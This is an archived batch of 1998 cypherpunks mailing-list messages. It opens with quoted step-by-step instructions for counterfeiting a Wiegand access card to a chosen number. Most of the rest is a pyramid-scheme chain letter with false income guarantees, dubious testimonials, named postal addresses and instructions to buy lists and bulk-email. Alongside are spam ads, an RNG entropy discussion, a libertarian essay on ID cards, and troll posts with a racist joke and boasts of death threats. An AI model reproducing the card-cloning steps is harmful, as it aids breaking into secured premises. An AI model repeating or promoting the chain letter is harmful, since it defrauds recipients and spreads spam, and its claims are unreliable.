>         Bodell's clear explanation of the working of a Wiegand card can
>         be visualized
>
>              zero row    |     |   |
>
>              one row        |          |
>
>              binary      0  1  0   0   1
>              representation
>
>         Solutions to Task 1
>
>              A    X-ray the card
>
>              B    MAGNI VIEW FILM,  Mylar film reads magnetic fields ...
>                   Edmunds Scientific Company, catalog 16N1, page
>                   205, C33,447  $11.75
>
>         is placed over the top of the Wiegand card.
>
>         COW MAGNET,  Cow magnetics allow farmers to trap metal in the
>         stomachs of their cows.  Edmunds, page 204, C31,101 $10.75
>         is placed under the card.
>
>         Location of the wires is easily seen on the green film.
>
>         Mark the position of the wires with a pen.
>
>         Next chop the card vertically using a shear into about 80/1000s
>         paper-match-sized strips.
>
>         Don't worry about cutting a wire or two.
>
>         Note that a 0 has the pen mark to the top.  A 1 has the pen mark
>         at the bottom.
>
>         Take a business card and layout the "paper match"-like strips to
>         counterfeit the card number desired.
>
>         Don't worry about spacing.  Wiegand output is self-clocking!
>
>         Tape the "paper-match - like" strips to the business card.
>
>         Only the FUNCTION of the card needs to be reproduced!
>
>                                      History
>
>         Breaking electronic locks was done as "work for others" at Sandia
>
>         National Laboratories beginning in 1992 funded by the Federal
>         Bureau of Investigation/Engineering Research Facility, Quantico,
>         VA.
>
>         The FBI opined that this work was SECRET/NATIONAL SECURITY
>         INFORMATION.
>
>         Details of the consequences of this work are covered in
>
>              Fired Worker File Lawsuit Against Sandia
>              Specialist Says He Balked When Lab Sought Electronic
>              Picklock Software, Albuquer Journal, Sunday April 25, 1993
>
>              State-sanctioned paranoia,  EE Times, January 22, 1996
>
>              One man's battle,  EE Times, March 22, 1994
>
>              Damn the torpedoes,  EE Times, June 6, 1994
>
>              Protecting properly classified info,  EE Times, April 11,
>              1994
>
>              DOE to scrutinize fairness in old whistle-blower cases,
>              Albuquerque Tribune, Nov 7 1995
>
>              DOE boss accelerates whistle-blower protection,  Albuquerque
>              Tribune, March 27, 1996
>
>              DOE doesn't plan to compensate 'old' whistle-blowers with
>              money, Albuquerque Tribune September 27, 199







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: h0uugi93@galaxylink.com.hk
Date: Fri, 31 Jul 1998 23:20:24 -0700 (PDT)
To: You@aol.com
Subject: Look At This
Message-ID: <199808010905.CAA16485@palm.telegraph.net>
MIME-Version: 1.0
Content-Type: text/plain



<HTML><PRE></P><P ALIGN=CENTER><FONT COLOR="#ff0000" SIZE=5><B>AMERICA'S # HOME BUSINESS</FONT><FONT COLOR="#000000" SIZE=3>

<FONT COLOR="#0000ff" SIZE=4>TELEMARKETING GOES MLM

No Selling

No recruiting

Great Income

Call Now,

You have nothing to Lose
I am making $1,000.00 per day, this is my
second day
Call
1 888 443 8971
ID#  2085</FONT><FONT COLOR="#000000" SIZE=4>
<FONT COLOR="#000000" SIZE=3></B>
</P><P ALIGN=LEFT>
The Mailing List that you are being mailed from was filtered against the Global Remove List at: http://remove-list.com
Remove-List is a free public service offering to help the general public get removed from bulk mailings lists and has not sent this message. If you want their help, please add your name to their list and you will not receive a bulk email from us or any other ethical bulk emailer</PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anne <fivebuz@hotmail.com>
Date: Sat, 1 Aug 1998 05:57:07 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: How to earn yourself $50,000 in 90 days!!
Message-ID: <419.436008.87662292 fivebuz@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Our research indicates the following material may be of interest
to you. If you prefer NOT to learn the easy way to make some much
needed income, please, simply delete this letter.  To further
insure you do not get email of this nature, there are several
universal "remove" lists you can subscribe to on the internet.
I filter all email addresses that I send to against such a
"remove" list of over 2,000,000 subscribers.

Please accept my apology if this was sent to you in error!

***************************************************************
You are about to make up to $50,000-In less than 90 days
Read the enclosed program...THEN READ IT AGAIN!
***************************************************************
This is the letter that got my attention.  Read on and I'm sure
you will agree that this is a great plan!


Dear Friend,

The enclosed information is something I almost let slip through
my Fingers. Fortunately, sometime later I re-read everything and
gave some thought and study to it. Please do the same.  It's so
simple to do.

And you won't be left out in the cold to figure it all out yourself.
Look further down in this letter for the  information you will
receive from Abot Marketing.  They give you 10,000 fresh email
addresses and give you the locations of the best software (FREE
SOFTWARE) to send out large quantities of email. (normally  this
kind of software is several hundred dollars) They even give you
easy to understand, proven, step by  step instructions for success
with this program.  In fact, they helped me get started and I'm
so thankful.  It's  hard to belive that this as simple as it is,
but it really is SIMPLE. You will even get support from them via
email anytime you need it.  You won't get this kind of help from
other programs of this nature. It makes all the difference in the world.


My name is Anne Bowman. I am 31-year-old graduate student desperately
trying to finish my degree and begin working in my chosen field
that is, if I am lucky enough to find a job in the crowded market.
Like most people in this day and age, it is hard to make ends
meet, and being a student does not help the situation at all
(If I ever have to buy one more box of macaroni and cheese I
think I would have to scream). I returned to school after
having worked for several years with little potential for
achieving what I had expected out of life.  I figured if I
returned to school and received my Ph.D there would be several
pportunities for me out there to achieve my goals. After seeing
my fellow graduate students receive their degrees and,
depressingly, not find respectable positions in their chosen
field I began to think, "Oh no not again!"  Four extra years
in school and an extra $20,000 in student loans on top of the
first $18,000, what will I do if the same happens to me?"
I began to doubt my patience for the long term investment in
schooling, and decided enough was enough, "Why can't I make
real money now instead of waiting to graduate with no guarantee
of a lucrative return for all of my efforts!"  I am writing to
share my experience with other hopeful students out there, as
well as ANYONE looking for an pportunity to take their financial
situation into their own hands.  I hope you will consider this
opportunity seriously and that this will change your life FOREVER!
., FINANCIALLY!!!  And once you get started it takes so little
of your time.

In mid October 97 I received this program. I didn't send for it,or
ask for it, they just got my name off a mailing list. I TOOK THIS
AS A SIGN!!!  After reading it several times, to make sure I was
reading it correctly, it made perfect sense. Here was a MONEY-MAKING
PHENOMENON. I could invest as much as I wanted to start (about as
much as it costs for a pizza!), without putting me further in debt.
After I got a pencil and paper and figured it out, I would at least
get my money back. After determining that the program is LEGAL and
NOT A CHAIN LETTER, I decided "I HAVE NOTHING TO LOSE".

Initially I sent 15,000 emails, (without any costs to me) only a couple
of hours of my time on-line. The great thing about email is that I didn't
need any money for printing to send out the program, only the time to
fulfill my orders.  There is a vast on-line market available to everyone
who owns a computer.  Following the advice of the person from whom I received
this letter, I am telling you like it is, and I hope it doesn't turn you
off, but I promised myself I would not "rip-off" anyone, no matter how much
money it cost me!  After you receive the reports they should explain
everything to you.  You may have some general questions, however, and after
I send you REPORT #1 , please feel free to contact me and I will give
you any advice you need.

In one week, I was starting to receive orders for REPORT #1.
By mid November, I had received 40 orders for REPORT #1. When you read the
GUARANTEE in the program you will see that "YOU MUST RECEIVE 15 TO 20 
ORDERS
FOR REPORT #1 WITHIN 2 WEEKS IF YOU DON'T SEND OUT MORE 
PROGRAMS UNTIL 
YOU
DO!" My first step in making $50,000 in 20 to 90 days was done. By the
beginning of December, I had received 174 orders for REPORT #2. If you go
back to the GUARANTEE. "YOU MUST RECEIVE 100 OR MORE ORDERS FOR 
REPORT #2
WITHIN TWO WEEKS. IF NOT SEND OUT MORE PROGRAMS UNTIL YOU DO. 
ONCE YOU 
HAVE
100 ORDERS, THE REST IS EASY, RELAX, YOU WILL MAKE YOUR $50,000 GOAL". 
Well,
I had 174 orders for REPORT #2, 74 more than I needed. So I sat back and
relaxed. By January 20th, of my emailing of 15,000, I received $54,000 with
more coming in ever day.  The great thing about this program is you can
begin the process over and over again without any limit on potential income!

I paid off ALL my student loans, and together with everything I have learned
in school, I am now saving in order to open up my own business related to
my field as soon as I graduate. Please take time to read the attached
program. IT WILL CHANGE YOUR LIFE FOREVER! Remember, it won't work if you
don't try it. This program does work, but you must follow it EXACTLY!
Especially the rules of not trying to place your name in a different place
on the list. It doesn't work, you'll lose out on a lot of money! REPORT #2
explains this. ALWAYS follow the guarantee, 15 to 20 orders of REPORT #1
and 100 or more orders for REPORT #2 and you will make $50,000 or more in
20 to 90 days. I AM LIVING PROOF THAT IT WORKS!!

If you choose not to participate in this program, I'm sorry, It really
is a great opportunity with little cost or risk to you. If you choose
to participate, follow the program and you will be on your way to
financial security.

To my fellow graduate students out there, good luck to you and I
sympathize.  And to all other persons in financial trouble consider
this letter a sign and please take advantage of this opportunity.
YOU WON'T BE DISAPPOINTED!
 

Sincerely,
Anne Bowman

The following testimonial was at the bottom of this letter but it
was too good to leave down there so I moved it up here.  It is
exactly how I felt at first and and feel now.

"The first week after I started this program was torture.
I couldnt wait to see if it was really going to work after I mailed
out my first batch of letters.  I chuckle every day now when I walk
out of the post office with my envelopes.  This is so easy, I still
can't belive it's happenning!" Don Masterson, Troy,NY


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

>From here down is the instruction portion of this letter...

This is a LEGAL, MONEY-MAKING PHENOMENON. PRINT this letter, read the
directions, THEN READ IT AGAIN !!!

You are about to embark on the most profitable and unique program you may 
ever see.  Many times over, it has demonstrated and proven its ability to
generate large amounts of cash. This program is showing fantastic appeal
with a huge and ever-growing on-line population desirous of additional income.

This is a legitimate, LEGAL, money-making opportunity.  It does not require you to
come in contact with people, do any hard work, and best of all, you never have to
leave the house, except to get the mail and go to the bank! 

This truly is that lucky break you've been waiting for!  Simply follow the easy
instructions in this letter, and your financial dreams will come true! When followed
correctly, this electronic, multi-level marketing program works perfectly...100%
EVERY TIME! 

Thousands of people have used this program to:
    -  Raise capital to start their own business
    -  Pay off debts
    -  Buy homes, cars, etc., 
    -  Even retire! 

This is your chance, so don't pass it up!

----------------------------------------------------------------------------------
OVERVIEW OF THIS EXTRAORDINARY ELECTRONIC 
MULTI-LEVEL MARKETING PROGRAM
----------------------------------------------------------------------------------

Basically, this is what we do:

We send thousands of people a product for $5.00 that costs next to 
nothing to produce and e-mail. As with all multi-level businesses, we
build our business by recruiting new partners and selling our products.
Every state in the U.S. allows you to recruit new multi- level business 
online (via your computer).

The products in this program are a series of four business and financial
reports costing $5.00 each.  Each order you receive via "snail mail" will
include:

  * $5.00 cash
  * The name and number of the report they are ordering
  * The e-mail address where you will e-mail them the report they ordered.

To fill each order, you simply e-mail the product to the buyer. The $5.00 is yours!
This is the most EASIEST electronic multi-level marketing business anywhere!
 
FOLLOW THE INSTRUCTIONS TO THE LETTER AND
BE PREPARED TO REAP THE STAGGERING BENEFITS!

******* I N S T R U C T I O N S *******

This is what you MUST do:

1.  Order all 4 reports shown on the list below (you can't sell them if you
don't order them).
     
     *  For each report, send $5.00 CASH, the NAME & NUMBER OF THE 
        REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR
        RETURN POSTAL ADDRESS (in case of a problem) to the person whose 
        name appears on the list next to the report.
  
     *  When you place your order, make sure you order each of the four
        reports.  You will need all four reports so that you can save them
        on your computer and resell them.

     *  Within a few days you will receive, via e-mail, each of the four
         reports.  Save them on your computer so they will be accessible
         for you to send to the 1,000's of people who will order them from you.

2.  IMPORTANT-- DO NOT alter the names of the people who are listed
     next  to each report, or their sequence on the list, in any way other
     than is instructed below in steps "a" through "d" or you will lose out
     on the majority of your profits.  ONCE YOU UNDERSTAND THE WAY THIS
     WORKS, YOU WILL UNDERSTAND WHY IT DOESN'T WORK IF YOU CHANGE 
IT.  
Remember,
     this method has been tested, and if you alter it, it will not work.

    a.  Look below for the listing of available reports.

    b.  After you've ordered the four reports, replace the name and address
         under REPORT #1 with your name and address, moving the one that 
         was there down to REPORT #2.  

    c.  Move the name and address that was under REPORT #2 down to 
         REPORT #3.  

    d.  Move the name and address that was under REPORT #3 down to 
         REPORT #4.  

    e.  The name and address that was under REPORT #4 is removed from
         the list and has NO DOUBT collected their 50 grand.

Please make sure you copy everyone's name and address ACCURATELY!!!

3.  Take this entire letter, including the modified list of names, and save
     it to your computer.  Make NO changes to the INSTRUCTION portion of
     this letter.    
  
4.  Now you're ready to start an advertising campaign on the
     Internet!  Advertising on the Internet is very, very
     inexpensive, and there are HUNDREDS of FREE places to
     advertise, but email has, by far, proven itself to be the best medium for
     this program.  And the emailers best friend is e-mail lists.
     You can buy these lists for under $20/20,000 addresses or you can pay
     someone a minimal charge to take care of the mailing for you.  BE SURE TO 
START 
     YOUR AD CAMPAIGN IMMEDIATELY!  Each day that passes while you think 
about 
     it is a day without profit.  

5.  For every $5.00 you receive, all you must do is e-mail them the report
     they ordered.  THAT'S IT!  ALWAYS PROVIDE SAME-DAY SERVICE 
     ON ALL ORDERS!  This will guarantee that the e-mail THEY send out,
     with YOUR name and address on it, will be prompt because they can't
     advertise until they receive the report!

------------------------------------------
AVAILABLE REPORTS
------------------------------------------
***Order Each REPORT by NUMBER and NAME***

Notes:
-  ALWAYS SEND $5 CASH FOR EACH REPORT 
-  ALWAYS SEND YOUR ORDER VIA FIRST CLASS MAIL 
-  Make sure the cash is concealed by wrapping it in at least two sheets of
paper  
-  On one of those sheets of paper, include: (a) the number & name of the
report you are ordering, (b) your e-mail address, and (c) your postal
address.  (using your printer is the best way to do this)
_________________________________________________________________
REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTILEVEL SALES" 

ORDER REPORT #1 FROM:  
ALBERT N
YISHUN CENTRAL POST OFFICE
PO BOX 307
SINGAPORE 917611

*****IMPORTANT NOTE*****
- US Dollar currency only please
- Once again, make sure the cash is concealed by wrapping it
  in at least "two" sheets of paper  
_________________________________________________________________
REPORT #2 "MAJOR CORPORATIONS AND MULTILEVEL SALES"

ORDER REPORT #2 FROM:  
J.F.J
P.O. Box 342
McCormick, SC 29835-0342
USA
_________________________________________________________________
REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:
Matt G
3801 Brooklyn Ave. NE #A102-1
Seattle, WA 98105      
USA
_________________________________________________________________
REPORT #4 "EVALUATING MULTILEVEL SALES PLANS"

ORDER REPORT #4 FROM:
Abot Marketing
PO BOX 2523
Chapel Hill, NC 27515-2523
USA


*****IMPORTANT NOTE*****
My personal success is due to sending out emails to prospective
participants, I am happy to help you get started by giving you
10,000 free current email addresses and giving you the location
of several free programs that will allow you to send out large
quantities of e-mail easily. I will email the fresh addresses
and software information to you the same day I receive your
report request.  Just jot down "free help please" on the report
request that you send with your $5.  In many cases I can take
care of your mailing for you at NO CHARGE.  You will receive my
real email address when I send you this report and you can contact
me for any questions you may have. (program participants, you may
leave this offer with my name as I am moved down the list.  I will
honor it for the duration of the program. Just move it down, with my 
name, to the next position when you send out your first mailings.)      
_________________________________________________________________


----------------------------------------------------------------------------
HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
----------------------------------------------------------------------------

Let's say you decide to start small just to see how well it works.  Assume
your goal is to get 10 people to participate on your first level.  (Placing
a lot of FREE ads on the Internet will EASILY get a larger response.) Also
assume that everyone else in YOUR ORGANIZATION gets ONLY 10 down line
members. Follow this example to achieve the STAGGERING results below.

1st level--your 10 members with$5...................................$50
2nd level--10 members from those 10 ($5 x 100)..................$500
3rd level--10 members from those 100 ($5 x 1,000)..........$5,000
4th level--10 members from those 1,000 ($5 x 10,000)...$50,000
THIS TOTALS----------->$55,550

Remember friends, this assumes that the people who participate only
recruit 10 people each.  Think for a moment what would happen if they
got 20 people to participate!  Most people get 100's of participants!  
THINK ABOUT IT!

Your cost to participate in this is practically nothing (surely you can
afford $20 for a chance to make $ 55,000).  You obviously already have
an Internet connection and e-mail is FREE!!!  REPORT# 3 shows you the
most productive methods for bulk e-mailing and purchasing e-mail lists.
Some list & bulk e-mail vendors even work on trade!

About 50,000 new people get online every month!

*******TIPS FOR SUCCESS*******

 *  TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, and follow 
     the directions accurately.

 *  Send for the four reports IMMEDIATELY so you will have them when 
    the orders start coming in because:

    When you receive a $5 order, you MUST send out the requested
    product/report to comply with the U.S.  Postal & Lottery Laws, Title
    18,Sections 1302 and 1341 or Title 18,  Section 3005 in the U.S.  Code,
    also Code of Federal Regs.  Vol..  16, Sections 255 and 436, which
    state that "a product or service must be exchanged for money received."

 *  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

 *  Be patient and persistent with this program.  If you follow the 
    instructions exactly, the results WILL undoubtedly be SUCCESSFUL!

 *  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!

*******YOUR SUCCESS GUIDELINE*******

Follow these guidelines to guarantee your success:
I CAN'T STRESS ENOUGH HOW IMPORTANT THIS NEXT SECTION IS!!!!

If you don't receive 10 to 20 orders for REPORT #1 within two weeks,
continue advertising until you do.  Then, a couple of weeks later you
should receive at least 100 orders for REPORT #2.  If you don't, continue
advertising until you do.  Once you have received 100 or more orders
for REPORT #2, YOU CAN RELAX, because the system is already working
for you, and the cash will continue to roll in!

THIS IS IMPORTANT TO REMEMBER:

Every time your name is moved down on the list, you are placed in front of
a DIFFERENT report.  You can KEEP TRACK of your PROGRESS by watching
which report people are ordering from you.  If you want to generate more income,
send another batch of e-mails and start the whole process again!  There is
no limit to the income you will generate from this business!

NOTE:  If you need help with starting a business, registering a business
name, how income tax is handled, etc., contact your local office of the Small
Business Administration (a Federal agency) for free help and answers to
questions.  Also, the Internal Revenue Service offers free help via telephone
and free seminars about business taxes.

*******T  E  S  T  I  M  O  N  I  A  L  S*******

The first week after I started this program was torture.  I couldnt
wait to see if it was really going to work after I mailed out my first
batch of letters.  I chuckle every day now when I walk out of the post
office with my envelopes.  This is so easy, I still can't belive it's
happenning! Don Masterson, Troy,NY


This program does work, but you must follow it EXACTLY!  Especially
the rule of not trying to place your name in a different position, it won't
work and you'll lose a lot of potential income.  I'm living proof that it works.
It really is a great opportunity to make relatively easy money, with little
cost to you.  If you do choose to participate, follow the program exactly,
and you'll be on your way to financial security. 
Sean McLaughlin, Jackson, MS

My name is Frank.  My wife, Doris, and I live in Bel-Air, MD.  I am a
cost accountant with a major U.S. Corporation and I make pretty good
money. When I received the program I grumbled to Doris about receiving
"junk mail." I made fun of the whole thing, spouting my knowledge of the
population and percentages involved.  I "knew" it wouldn't work.  Doris
totally ignored my supposed intelligence and jumped in with both feet. 
I made merciless fun of her, and was ready to lay the old "I told you so"
on her when the thing didn't work...  Well, the laugh was on me!  Within
two weeks she had received over 50 responses.  Within 45 days she had
received over $147,200 in $5 bills!  I was shocked!  I was sure that I had
it all figured and that it wouldn't work. I AM a believer now.  I have joined
Doris in her "hobby."   I did have seven more years until retirement, but I
think of the "rat race" and it's not for me.  We owe it all to MLM.
Frank T., Bel-Air, MD

I just want to pass along my best wishes and encouragement to you.  Any
doubts you have will vanish when your first orders come in.  I even checked
with the U.S.  Post Office to verify that the plan was legal.  It definitely is!
IT WORKS!!!
Paul Johnson, Raleigh, NC

The main reason for this letter is to convince you that this system is
honest, lawful, extremely profitable, and is a way to get a large amount of
money in a short time.  I was approached several times before I checked
this out.  I joined just to see what one could expect in return for the minimal
effort and money required.  To my astonishment, I received $36,470.00 in
the first 14 weeks, with money still coming in.
Sincerely yours, Phillip A.  Brown, Esq.

Not being the gambling type, it took me several weeks to make up my
mind to participate in this plan.  But conservative that I am, I decided that
the initial investment was so little that there was just no way that I wouldn't
get enough orders to at least get my money back.  Boy, was I surprised when
I found my medium-size post office box crammed with orders!  For awhile, it
got so overloaded that I had to start picking up my mail at the window.  I'll
make more money this year than any 10 years of my life before.  The nice thing
about this deal is that it doesn't matter where in the U.S. the people live. There
simply isn't a better investment with a faster return.
Mary Rockland, Lansing, MI

I had received this program before.  I deleted it, but later I wondered
if I shouldn't have given it a try.  Of course, I had no idea who to contact
to get another copy, so I had to wait until I was e-mailed another program. 
11 months passed then it came...I didn't delete this one!...I made more than
$41,000 on the first try!!
Wilburn, Muncie, IN

This is my third time to participate in this plan.  We have quit our jobs,
and will soon buy a home on the beach and live off the interest on our
money.  The only way on earth that this plan will work for you is if you do
it.  For your sake, and for your family's sake don't pass up this golden
opportunity.  Good luck and happy spending!
Charles Fairchild, Spokane, WA


ORDER YOUR REPORTS TODAY AND GET 
STARTED ON YOUR ROAD TO
FINANCIAL FREEDOM!!!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 31 Jul 1998 20:59:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808010400.GAA04134@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


> I had begun by thinking that, since the output of a block cipher in
> feedback mode (ie, a stream cipher) is uniformly distributed ("white") that
> it would be sufficient conditioning to feed a bad RNG into a block cipher
> with feedback.  Here, the bad RNG would kick the cipher out of the fixed,
> but key-dependant, sequence it would otherwise generate.

I don't quite parse what you're saying here...?

(more reply below)
... 
> On cypherpunks, Bill Stewart mentioned using hashes instead of ciphers.  
> A hash is like a cipher in that changing any input or key bit changes the
> output unpredictably, but a hash is irreversible because there are fewer
> output bits than input bits.  The simplest hash is a one-bit parity; MD5
> is a more expensive keyed hashing function used for message
> authentication.
> 
> Thinking about a hash instead of a cipher was interesting because now
> we reduce the number of output bits, which if done right, could
> improve the information carried by each binary digit.  We take the MAC
> of an imperfect random number and toss the original random, retaining
> the MAC as our better random value.

The problem with XORing is that you might have a generator where bits are
interdependent in a way that causes entropy to be lost in the XOR. You
generally don't have this problem with the more involved mixing functions.

If the construction you use for distilling the RNG's output to a random
number works as a collision-free hash function, you can place a lower
bound on the amount of entropy in the output based on how long it takes to
simulate the biases in the RNG (I posted a somewhat confuberated
description of the reasoning to coderpunks -- basically, if the hash of
the simulation's output has little enough entropy, it means you can break
the hash; since you can't break the hash, the output can't have that
little entropy). Normally, though, you can get away with using pretty much
any nonlinear mixing function, even if it's not a good hash function.

An "entropy pool" setup where you can put entropy in and pull keys out at
will gets slightly more hairy...if you want to do that, I suggest you try
to contact someone who knows what he/she's doing. :)

Should that prove infeasible, key a stream cipher with the mixed entropy,
and, when you want to pull a key out, grab some stream cipher output; when
you want to drop entropy in, mix some stream cipher output with your new
entropy and rekey the stream cipher with the result (to save time, I'd
only do the rekeying right before I want a key containing the new
entropy). Probably a lot more complicated and slow than it needs to be,
but I think it lets you add any amount of entropy you want without fear of
an attacker somehow interfering with the generation.

...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sat, 1 Aug 1998 18:17:38 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Virgin rebirth/Penis pong/Beaver boy
Message-ID: <19980801081100.8187.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/1/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 31 Jul 1998 23:43:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Where do you roam?
Message-ID: <199808010643.IAA15232@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


SC>At 5:28 AM -0400 7/31/98, Michael Hohensee wrote:
SC>>Source: Handgunner Magazine, Sept./Oct. 1998, page 154:
SC>Paladin sought to reverse the ruling of the U.S. Court of Appeals for the
SC>Fourth Circuit, whichfound that the book Hit Man: A Technical Manual for
SC>Independent Contractors enjoyed no FirstAmendment protection because, in
SC>that court's opinion (based in part on the stipulations of theparties), a
SC>jury could find that the book's content amounted to the aiding and abetting
SC>of criminalconduct. 

I've  been reading the Bible lately, and it's content has been aiding
and
abetting me in all kinds of criminal misconduct, like murdering a
crapload of 
Arabs and other assorted non-Jewish darkies.
Anybody think that the U.S. Court of Appeals for the Fourth Circuit is
prepared to refrain from being hypocritical, and rule that the Bible
does
not enjoy FirstAmendment protection?

Tojohoto,
The ApplePie Murderer
                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 1 Aug 1998 00:36:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CypherPunks Are Stupid DickWads!!!
Message-ID: <199808010736.JAA18065@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Cuthmarks=***

Ha! Ha! Ha!

I can say anything I want about you guys and you won't know who I am,
because I am using an AnonymousRemailer (TM).
How does it feel to have your own CypherPunksTechnology turned against
you, eh?
And there's nothing you can do about it, because you don't know who I
am...

Hell, I can even badmouth the remailer operators, while using their own 
systems to send out my email badmouthing them, eh?
I mean, these RemailerOperators are really stupid lamers, eh? I mean,
they
can't even get their messages to come out in the same order that they
came in by...
  Dumb, eh? Some of the test messages I sent to myself came back in a
different order from that what I sent them in. I guess these guys don't
know much about computers, eh?
  And those names, 'Anonymous' and 'Nobody', aren't fooling AnyBody,
because the minute you see them, you *know* that the message is
from a remailer.  Dumb, eh?

  Well, I just thought I'd let you guys know how stupid you are and how
you'll never know who I am, or how to find me, because I am cutting the
edge off of computer technology.

MrOrMsAnonymousNobody!ADickWaddLikeYouGuys
p.s. - It's a damn good thing you can't find me, neither, because my
     new email account is on a system that is so straight that my
     email is automatically scanned for BadWords before being sent
     out, and I have to either use misspelled BadWords like Phuck,
     BadWords which aren't in the BadWordDictionary, like DickWadd,
     or send the chapters of SPACE ALIENS HIDE MY DRUGS!!! to
     the CypherPunks Disturbed Male LISP couched and potatoed in
     ConvectionalEncraption.
                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: toto@fhouse.org
Date: Sat, 1 Aug 1998 09:00:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Did you *really* write PGP?
Message-ID: <TCPSMTP.18.8.1.9.48.58.2847582152.1142453@fhouse.org>
MIME-Version: 1.0
Content-Type: text/plain


PRZ,
  Some guys from the Secret Service came to see me about the Death
Threats
I've been sending you.
  It's pretty funny that after all those years of persecuting you, the
GuberMint
is now paying these guys to protect you, eh?

  They sure looked at me funny when I told them that it was all in good
humor,
and that I wouldn't dream of doing anything bad to the guy who wrote
PGP.
  Are you *sure* you wrote it? They don't seem to think so...

  Do you play the saxaphone? They said you play the saxaphone.

  Anyway, say "Hi!" to Buddy for me...

Your Pal and CoConspirator,
Toto
~~~~
                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 1 Aug 1998 10:22:48 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>, "e$@vmeng.com" <e$@vmeng.com>
Subject: french Libertarian e-zine in Quebec, Canada (excerpt)
Message-ID: <199808011738.NAA26999@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



This magazine is bilingual but not translated.  Articles are published in their original language only.  If the author does a translation, both versions are likely to be published.
Ciao
JFA
Montral, le 1er ao1998    Numro 17    
LE QUBCOIS LIBRE (page 6)       LE QUBCOIS LIBRE sollicite des textes d'opinion <mailto: libre@colba.net> qui dfendent ou contestent le point de vue libertarien sur n'importe quel sujet d'actualit. Les textes doivent avoir entre 700 et 1200 mots. Prire d'inclure votre titre ou profession, le village ou la ville ovous habitez, ainsi que votre adresse lectronique.               
 <980801-5.htm> <980801-5.htm>page prcdente  Vos commentaires <mailto: libre@colba.net>     MUSINGS BY MADDOCKS 
ID IN THE USA:  GIVING THEM THE FINGER by Ralph Maddocks   
In June of this year, the US Department of Transportation's National Highway Traffic Safety Administration proposed some new rules, effective October 1, 2000. They require all citizens to obtain a driver's licence containing a social security number. The law makes mention of "biometric identifiers "by which is meant such high-tech delights as digitized thumb or fingerprints on magnetic strips. An unrelated, for the moment, announcement by the Immigration Service on June 23 revealed a new identification system called INSPASS. The latter is a system which verifies such things as retinal and hand scans in order to let frequent travelers pass through customs more quickly. All very efficient.   In this land of the free, whose praises are sung ad nauseam, these kinds of regulations are being introduced frequently and surreptitiously so that the average man, or woman, in the street will not realize what is happening until it is far too late to protest. Requirements such as social security numbers on driving licences are leading inevitably towards their becoming national identity cards. A card which the citizen will soon need to secure government services, apply for a job, conduct banking transactions or even to buy something as simple as an airline ticket.     

An old topic with a new twist Of course this topic is not new to the US, various groups have been proposing tamper-proof ID cards for many years. Often this was connected to discussions on gun control or immigration, it being believed that illegal immigration could be deterred by the use of such cards. The fact that they would be no more reliable than the documents produced originally to obtain them, plus the estimated $2.5 billions required to implement them, does not deter those who would mandate their use. A great deal of the impetus for ID cards is coming from California where a serious illegal immigration problem does indeed exist. As usual, politicians possessed of little or no imagination propose simplistic solutions to complex social and economic problems. Their idea being that such a card would become a kind of employment passport, which illegal immigrants would not possess. Unless, that is, their friendly local forger could supply one. There can be little doubt that the appearance of such a card would be welcomed by the police, they could then stop people at will and ask for some identification. The potential for the harassment of strange, different looking or foreign sounding individuals will increase exponentially. Minorities such as Asians, Latinos and African Americans will become even more perfect targets for such identity checks. Other groups too, such as banks, health insurers, landlords, merchants and others, salivate at the prospect of employing ID cards in their daily activities. Information, once gathered, can be stored at almost no cost, and retrieved in any imaginable sequence. It is this which is providing the incentive to collect the sort of information that has hitherto been maintained about only a very small portion of the population. The United States already has in its education system a national electronic network of student records. The purpose of this system being to allow the exchange of information between various public and private agencies, and the tracking of individuals through school and university, through their military service, through the criminal justice 